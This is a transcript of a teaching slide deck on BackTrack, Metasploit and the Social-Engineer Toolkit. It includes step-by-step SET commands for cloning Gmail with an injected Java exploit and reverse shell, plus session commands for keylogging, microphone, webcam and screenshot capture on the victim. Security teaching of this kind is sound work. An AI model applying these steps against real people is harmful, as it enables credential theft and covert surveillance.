1 / 25

Backtrack Metasploit and SET

Backtrack Metasploit and SET. BackTrack. A Linux distribution designed for penetration testing, aka "ethical hacking" Many, many tools for hacking into any type of system, wireless or wired A huge library of drivers and support routines Backtrack 4 is based on Ubuntu Linux. Downloads.

Download Presentation

Backtrack Metasploit and SET

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Backtrack Metasploitand SET

  2. BackTrack • A Linux distribution designed for penetration testing, aka "ethical hacking" • Many, many tools for hacking into any type of system, wireless or wired • A huge library of drivers and support routines • Backtrack 4 is based on Ubuntu Linux

  3. Downloads • http://www.backtrack-linux.org • Available as a bootable DVD or a pre-installed virtual machine (VM) • The DVD can be used for computer forensics, but Raptor is better for that • The VM is best for most classroom demonstrations and projects

  4. BackTrack Gotchas • You need to log in to start it • User name: root • Password: toor • The graphical desktop does not start by default # startx

  5. BackTrack Gotchas • Networking is not started by default • Because you may be trying to conceal your presence • To start networking: # /etc/init.d/networking start • To renew a DHCP address # dhclient

  6. Metasploit

  7. Metasploit Framework • Makes it easy to rapidly add new attacks • Attacks are often added before patches exist, creating "Zero-Day" attacks • I typically assign several zero-day attacks per semester now as homework • It's not supposed to work this way; cyberspace is really dangerous these days

  8. Cross-platform • Metasploit runs on Windows, Linux, or Unix • But the Windows version doesn't have all the new attacks • Installing it on Linux can be frustrating because it needs libraries and drivers

  9. The Solution • Backtrack contains Metasploit, with all the required support modules included • This saves students many hours

  10. SETSocial-Engineer Toolkit

  11. SET uses Metasploit • There is a "social engineering" aspect in most hacking • Tricking a user into making a mistake, that lets you in • Clicking a link • Ignoring an error message • Opening an attachment • Etc.

  12. Today's AttackTarget: Win 7Vuln: Java 0-Day

  13. Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page Java Exploit Code Added to Web Page TargetUsingGmail

  14. DEMO

  15. Dave Kennedy & Kevin MitnickMade this Video

  16. Preparation • Download Backtrack 4 R 2 Virtual Machine • Run it in VMware Workstation • Get it networking to the Internet and the target—"Bridged" is best

  17. Commands • cd /pentest/exploits/SET • ./set • Enter option 2: Website Attack Vectors • Enter option 1: The Java Attack Method • Enter option 2: Site Cloner • Enter urlhttps://gmail.com • It asks you "What payload do you want to generate:" and lists 11 choices • Press Enter for default • It shows a list of 16 encodings to try and bypass AV. • Press Enter for default • It asks you to "Enter the PORT of the listener (enter for default): • Press Enter for default • It asks you whether you want to create a Linux.OSXreverse_tcp payload. • Enter no • It now shows blue text saying: • [*] Launching MSF Listener... • [*] This may take a few to load MSF... • Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message: • msf auxiliary(smb) >

  18. On the Target • Open a Web browser and go to the Metasploit IP address • Works on IE, Firefox, and Chrome • User will see thiswarning box • Studies show thatusers almost alwaysjust click pastthose warning boxes

  19. GAME OVER • The target is now owned. We can • Capture screenshots • Capture keystrokes • Turn on the microphone and listen • Turn on the webcam and take photo • Steal password hashes • Etc.

  20. Fun & Games • To remotely control the target: • sessions -i 1 • Commands to try: • screenshot • keyscan_start • keyscan_stop • record_mic 10 • webcam_list • webcam_snap 1

  21. Protecting Yourself

  22. The Usual Stuff • This stuff is all helpful • Get Antivirus, like Microsoft Security Essentials • Install patches (when they exist) • Get a Mac • Keep image-based backups so you can recover after an infection • But none of it can really save you

  23. Attack > Defense • Even corporate desktop computers are infected • The Chinese got into Google and >30 other huge companies last year • Don't imagine you are immune

More Related